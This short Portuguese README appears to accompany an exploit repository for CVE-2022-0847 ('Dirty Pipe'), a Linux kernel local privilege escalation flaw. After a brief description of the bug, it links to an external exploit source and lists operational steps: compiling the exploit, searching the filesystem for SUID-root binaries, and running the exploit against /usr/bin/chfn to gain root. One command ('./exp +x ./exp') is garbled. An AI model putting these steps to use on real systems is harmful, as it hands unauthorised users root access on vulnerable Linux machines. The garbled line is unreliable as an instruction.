
CVE-2022-0847-DirtyPipe-Exploit
Em 7 de março, o pesquisador de segurança estrangeiro Max Kellermann publicou uma postagem em seu blog revelando uma vulnerabilidade de escalada de privilégio local no kernel Linux, a CVE-2022-0847: https://dirtypipe.cm4all.com/
A CVE-2022-0847 é uma vulnerabilidade de escalada de privilégio local presente no kernel Linux 5.8 e versões posteriores. Ao explorar essa vulnerabilidade, um atacante pode sobrescrever dados em qualquer arquivo legível, elevando assim um usuário com privilégios comuns a root.
O princípio da CVE-2022-0847 é semelhante ao do Dirty Cow (CVE-2016-5195), mas é mais fácil de explorar. O autor da vulnerabilidade a batizou de "Dirty Pipe".
Link: https://haxx.in/files/dirtypipez.c
Autor: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
